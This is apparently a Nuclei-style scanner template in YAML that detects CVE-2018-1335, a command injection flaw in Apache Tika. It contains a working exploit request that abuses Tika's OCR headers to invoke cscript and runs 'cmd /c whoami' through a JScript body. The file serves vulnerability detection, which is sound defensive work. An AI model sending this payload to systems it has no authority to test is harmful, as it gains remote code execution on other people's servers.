42 lines
1.0 KiB
YAML
42 lines
1.0 KiB
YAML
id: CVE-2018-1335
|
|
|
|
info:
|
|
name: Apache Tika 1.15-1.17 Header Command Injection
|
|
author: pikpikcu
|
|
severity: critical
|
|
reference:
|
|
- https://rhinosecuritylabs.com/application-security/exploiting-cve-2018-1335-apache-tika/
|
|
- https://www.exploit-db.com/exploits/47208
|
|
tags: cve,cve2018,apache,tika,rce
|
|
|
|
requests:
|
|
- method: PUT
|
|
path:
|
|
- "{{BaseURL}}/meta"
|
|
headers:
|
|
X-Tika-OCRTesseractPath: cscript
|
|
X-Tika-OCRLanguage: //E:Jscript
|
|
Expect: 100-continue
|
|
Content-type: image/jp2
|
|
Connection: close
|
|
body: "var oShell = WScript.CreateObject('WScript.Shell');var oExec = oShell.Exec(\"cmd /c whoami\");"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
|
|
- type: word
|
|
words:
|
|
- "Content-Type: text/csv"
|
|
part: header
|
|
|
|
- type: word
|
|
words:
|
|
- "org.apache.tika.parser.DefaultParser"
|
|
- "org.apache.tika.parser.gdal.GDALParse"
|
|
part: body
|
|
condition: and
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|